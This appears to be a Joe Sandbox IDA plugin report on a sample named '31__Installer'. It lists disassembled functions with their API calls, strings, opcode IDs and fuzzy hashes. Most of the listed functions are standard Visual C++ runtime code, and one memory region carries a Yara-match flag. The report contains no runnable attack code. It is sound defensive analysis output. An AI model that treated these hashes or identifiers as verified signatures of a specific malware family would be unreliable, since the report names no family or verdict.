Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 677fa2866a0c3436b224910c159ad71d3846a3e25a4e23e5c6bd2c079837061d
Instruction ID: a38228173b6d0422f154f3ddbef6b5453f2470410bb4c2b158d0073339a3f7d4
Opcode Fuzzy Hash: 677fa2866a0c3436b224910c159ad71d3846a3e25a4e23e5c6bd2c079837061d
Instruction Fuzzy Hash: 0121CDB8811345DFE746DF69EA846A43BE8BB08744F10106AE908E7BB0E7B05980CF09

Function 003EC71D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C6DB), ref: 003EC722

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9ad8f1d8e6312a1fc62e6c6b9b9f0912ad8a30d7aee5d0ecac0619be659c29bd
Instruction ID: c20414fcafdcdf504da1fc62c0929f59e13769f115b0a16955677051aecc810d
Opcode Fuzzy Hash: 9ad8f1d8e6312a1fc62e6c6b9b9f0912ad8a30d7aee5d0ecac0619be659c29bd
Instruction Fuzzy Hash: EA9002B02A11518747022B715E1975B39D55AD8706B462551A101E4198DE9041019952

Function 054649C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\VJm, xrefs: 05464C0B

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID: \VJm
API String ID: 0-4047210350
Opcode ID: f13c2fc8178a6eccb34b5adebdbc8ed2bf11a7640710116b53e5623020ec6e06
Instruction ID: 9bf813fabe4ebaeebbc8b5a44a70ea051af3b5afd29b5734ccb91cb84d5e7e4e
Opcode Fuzzy Hash: f13c2fc8178a6eccb34b5adebdbc8ed2bf11a7640710116b53e5623020ec6e06
Instruction Fuzzy Hash: 69914A70E042099FDF24CFA8C9947EEBBF2BF88714F14812AD415A7394EB759845CB82

Function 003F0B66 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 27c9e2907ca062e68cfaf5ca963bfcb20412a3ed1517714ca22aa846644f821a
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 6CC19F73D0A9F7498B3B422D451823EEEA26F91B4431FC391DED43F58AC627AD0196D0

Function 003F077E Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 3b30830091c66a65b8021e68a0e90969e94ae0a288a41a1bc3361dce89c483a8
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: C7C18B33D0A5F74A8B3B422D451863BEAA26F81B4931BC391CED43F59AC627AD0596D0

Function 003F03AC Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: d906f973c1b21921356d1363df15528df85f65c75981a348d4738c8e9fb01d4c
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: DAC19E73D0E5F74A8B3B422E451863BEE626F81B4431BC391CED43F68AC6276D1596D0

Function 003F000E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: d64015930ff60f77e21e0392a38e1565019d427dc658d4ae10513d0c565d35c8
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 70B1AF33D0A5B74A8B3B822D455863FEEA26F91B4431FC395CDD03F58ACA27AD0196D0

Function 054607A0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2fc00dafcc6523926814f7eb3d77fc6693b4c9039ea8ad664f7a0504cf2d65
Instruction ID: 9eb6e718fefb184a9b57b824684012bfc233e0373a6339b6effaa706746bf318
Opcode Fuzzy Hash: 8a2fc00dafcc6523926814f7eb3d77fc6693b4c9039ea8ad664f7a0504cf2d65
Instruction Fuzzy Hash: 38817074B052188BDB1DEF7594697BE7BA7BBC8640B05946EE40BE7284DE34CC028792

Function 02FA1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: 18d746c929e5d2e1d8b106f29733945e697d7db75ae6792ebe3ce52497a60b00
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 5FF03972200204AFCF158F4CDC51EAA77E9EF082A0F094069FE09D7221E331ED209F80

Function 003E1671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 003E98E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003E5A5E), ref: 003E98ED
__mtterm.LIBCMT ref: 003E98F9

Part of subcall function 003E9632: DecodePointer.KERNEL32(00000002,003E9A5B,?,003E5A5E), ref: 003E9643
Part of subcall function 003E9632: TlsFree.KERNEL32(00000002,003E9A5B,?,003E5A5E), ref: 003E965D
Part of subcall function 003E9632: DeleteCriticalSection.KERNEL32(00000000,00000000,77455810,?,003E9A5B,?,003E5A5E), ref: 003EB634
Part of subcall function 003E9632: _free.LIBCMT ref: 003EB637
Part of subcall function 003E9632: DeleteCriticalSection.KERNEL32(00000002,77455810,?,003E9A5B,?,003E5A5E), ref: 003EB65E

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003E990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003E991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003E9929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003E9936
TlsAlloc.KERNEL32(?,003E5A5E), ref: 003E9986
TlsSetValue.KERNEL32(00000000,?,003E5A5E), ref: 003E99A1
__init_pointers.LIBCMT ref: 003E99AB
EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99BC
EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99C9
EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99D6
EncodePointer.KERNEL32(?,003E5A5E), ref: 003E99E3
DecodePointer.KERNEL32(003E97B6,?,003E5A5E), ref: 003E9A04
__calloc_crt.LIBCMT ref: 003E9A19
DecodePointer.KERNEL32(00000000,?,003E5A5E), ref: 003E9A33
GetCurrentThreadId.KERNEL32 ref: 003E9A45

Strings

FlsAlloc, xrefs: 003E9909
FlsSetValue, xrefs: 003E991E
FlsFree, xrefs: 003E992B
KERNEL32.DLL, xrefs: 003E98E8
FlsGetValue, xrefs: 003E9911

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 62c6b940afe35d83e745296480b628933d85cb2d52cebf5112e4f9e1afbce3c2
Instruction ID: 74441fb0c62a810ab20f936ac0f6926c30e84c531fc60379038c8e22a56afba9
Opcode Fuzzy Hash: 62c6b940afe35d83e745296480b628933d85cb2d52cebf5112e4f9e1afbce3c2
Instruction Fuzzy Hash: 8C3166B19013A59EDB139F76AD0576A3BA8EB84360F05063BE514F72F2DB719840CF54

Function 003E2344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E2349
std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
int.LIBCPMT ref: 003E236F

Part of subcall function 003E1035: std::_Lockit::_Lockit.LIBCPMT ref: 003E1046

__CxxThrowException@8.LIBCMT ref: 003E23B4
std::locale::facet::_Incref.LIBCPMT ref: 003E23C4
std::locale::facet::_Facet_Register.LIBCPMT ref: 003E23CA

Strings

bad cast, xrefs: 003E239E

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
String ID: bad cast
API String ID: 262090721-3145022300
Opcode ID: d5c6bc39e33a101130e462f4bae4269634aa12cd80aeadb251031dbd25f2e209
Instruction ID: 4725c80e4175480aad3ac2c645bb15c53a53cfde5cb3c5b6d65ac4c01770a7b8
Opcode Fuzzy Hash: d5c6bc39e33a101130e462f4bae4269634aa12cd80aeadb251031dbd25f2e209
Instruction Fuzzy Hash: 4D1151369001A997CB17FB62D946AEE7339AB80760F11032AF5117B2D1DF749A058B94

Function 003E1E13 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E1E18
std::_Lockit::_Lockit.LIBCPMT ref: 003E1E27
int.LIBCPMT ref: 003E1E3E

Part of subcall function 003E1035: std::_Lockit::_Lockit.LIBCPMT ref: 003E1046

__CxxThrowException@8.LIBCMT ref: 003E1E83
std::locale::facet::_Incref.LIBCPMT ref: 003E1E93
std::locale::facet::_Facet_Register.LIBCPMT ref: 003E1E99

Strings

bad cast, xrefs: 003E1E6D

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
String ID: bad cast
API String ID: 262090721-3145022300
Opcode ID: b1d896ebe200894e21a1341cd99718555909687a3bd77fa44cfaa71715017f7a
Instruction ID: 75cc0ba38d5d4a234be16bef7ad5dc5a1fa612216f6b6cadebde3039a26598e8
Opcode Fuzzy Hash: b1d896ebe200894e21a1341cd99718555909687a3bd77fa44cfaa71715017f7a
Instruction Fuzzy Hash: 841173769001A997CF07FB62D906AFE7735ABC0721F15432AF5117B2D1DB349A058790

Function 003E7413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 003E741A

Part of subcall function 003E9723: GetLastError.KERNEL32(?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9727
Part of subcall function 003E9723: ___set_flsgetvalue.LIBCMT ref: 003E9735
Part of subcall function 003E9723: __calloc_crt.LIBCMT ref: 003E9749
Part of subcall function 003E9723: DecodePointer.KERNEL32(00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9763
Part of subcall function 003E9723: GetCurrentThreadId.KERNEL32 ref: 003E9779
Part of subcall function 003E9723: SetLastError.KERNEL32(00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9791

__calloc_crt.LIBCMT ref: 003E743C
__get_sys_err_msg.LIBCMT ref: 003E745A
_strcpy_s.LIBCMT ref: 003E7462
__invoke_watson.LIBCMT ref: 003E7477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003E7427, 003E744A

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 53eea75df67454ab67ec65f213c22b01839e27bc5955d176a50a06ebe8823637
Instruction ID: e3a670c2a1e0eb663119d14c0e537aa6956284ffc6c33358b6ed9f8e07c31681
Opcode Fuzzy Hash: 53eea75df67454ab67ec65f213c22b01839e27bc5955d176a50a06ebe8823637
Instruction Fuzzy Hash: 7BF0C07A50C3F427CB23392B5C81E6B7A9CCB40754B11073BFB48DF1C1E9209C004990

Function 003E1A66 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E1A6B
std::_Lockit::_Lockit.LIBCPMT ref: 003E1A7D
std::exception::exception.LIBCMT ref: 003E1AB4

Part of subcall function 003E3C6B: std::exception::_Copy_str.LIBCMT ref: 003E3C86

__CxxThrowException@8.LIBCMT ref: 003E1AC9

Part of subcall function 003E450C: RaiseException.KERNEL32(?,?,003E13AC,?,?,?,?,?,003E13AC,?,003FCCD8,00000000), ref: 003E454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003E1AD2

Strings

bad locale name, xrefs: 003E1AAD

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: 84d3a60618151b6f33f91d744532e66ede36c0e6abd1279ec693c498d121cd97
Instruction ID: 8cdf632f332321f21967360cdb1ff5c7963b7a6ced67d18a21e5183a351cf945
Opcode Fuzzy Hash: 84d3a60618151b6f33f91d744532e66ede36c0e6abd1279ec693c498d121cd97
Instruction Fuzzy Hash: 2E016176901798DECB12EF9AC4805DEFFF4BF19300B40862FE55997641C7749608CB95

Function 003E966F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,003FD628,00000008,003E9777,00000000,00000000,?,?,003EA8F0,003E4478,?,?,003E3C60,?,?,003E101C), ref: 003E9680
__lock.LIBCMT ref: 003E96B4

Part of subcall function 003EB747: __mtinitlocknum.LIBCMT ref: 003EB75D
Part of subcall function 003EB747: __amsg_exit.LIBCMT ref: 003EB769
Part of subcall function 003EB747: EnterCriticalSection.KERNEL32(00000000,00000000,?,003E96B9,0000000D), ref: 003EB771

InterlockedIncrement.KERNEL32(?), ref: 003E96C1
__lock.LIBCMT ref: 003E96D5
___addlocaleref.LIBCMT ref: 003E96F3

Strings

KERNEL32.DLL, xrefs: 003E967B

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: d04969183b3ab938893ce3c42fedb9c83615c45d3c3557647b502cd2a3e65207
Instruction ID: 9c79eda824f7417b38aaa2091c3a02152ca150d1bd66eb13543c1e3a5cfdcf53
Opcode Fuzzy Hash: d04969183b3ab938893ce3c42fedb9c83615c45d3c3557647b502cd2a3e65207
Instruction Fuzzy Hash: C201C471400B459FDB229F66C845759FBF0AF40324F10460EE5DA9A2E1CBB4A544CF15

Function 003E7993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 003E79BB

Part of subcall function 003E4842: __getptd.LIBCMT ref: 003E4850
Part of subcall function 003E4842: __getptd.LIBCMT ref: 003E485E

__getptd.LIBCMT ref: 003E79C5

Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC

__getptd.LIBCMT ref: 003E79D3
__getptd.LIBCMT ref: 003E79E1
__getptd.LIBCMT ref: 003E79EC
_CallCatchBlock2.LIBCMT ref: 003E7A12

Part of subcall function 003E48E7: __CallSettingFrame@12.LIBCMT ref: 003E4933

Part of subcall function 003E7AB9: __getptd.LIBCMT ref: 003E7AC8
Part of subcall function 003E7AB9: __getptd.LIBCMT ref: 003E7AD6

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 8852c955d825c35b92bf28dc4c0caeb336459275d55f8f177b5989e78b8a6c82
Instruction ID: 816b3272513b5c926608d193269ba4a88165e3e957b2342375fc700331a630b6
Opcode Fuzzy Hash: 8852c955d825c35b92bf28dc4c0caeb336459275d55f8f177b5989e78b8a6c82
Instruction Fuzzy Hash: 441126B1C00259DFDF01EFA5C445BADBBB0FF08310F11856AF814AB392DB389A149B50

Function 003ED1B4 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003ED1C0

Part of subcall function 003E979C: __getptd_noexit.LIBCMT ref: 003E979F
Part of subcall function 003E979C: __amsg_exit.LIBCMT ref: 003E97AC

__amsg_exit.LIBCMT ref: 003ED1E0
__lock.LIBCMT ref: 003ED1F0
InterlockedDecrement.KERNEL32(?), ref: 003ED20D
_free.LIBCMT ref: 003ED220
InterlockedIncrement.KERNEL32(00D61670), ref: 003ED238

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 1cb11157ea04c8544797a355939a741e02ba5087a32e205fbe9c667fb7e6d72d
Instruction ID: 3e743d6e05d2de83327010d44b32f21fd490554ef8ad983ad562c3990aaecff5
Opcode Fuzzy Hash: 1cb11157ea04c8544797a355939a741e02ba5087a32e205fbe9c667fb7e6d72d
Instruction Fuzzy Hash: 1401C032D016B59BCB23AF269805BADB364BF04761F060225FD00AB7D1CB34AA41CBD5

Function 003E1AEB Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E1AF0
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003E1B04

Part of subcall function 003E32DA: _setlocale.LIBCMT ref: 003E32EC

_free.LIBCMT ref: 003E1B12

Part of subcall function 003E4452: HeapFree.KERNEL32(00000000,00000000,?,003E3C60,?,?,003E101C), ref: 003E4468
Part of subcall function 003E4452: GetLastError.KERNEL32(?,?,003E3C60,?,?,003E101C), ref: 003E447A

_free.LIBCMT ref: 003E1B24
_free.LIBCMT ref: 003E1B36
_free.LIBCMT ref: 003E1B48

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
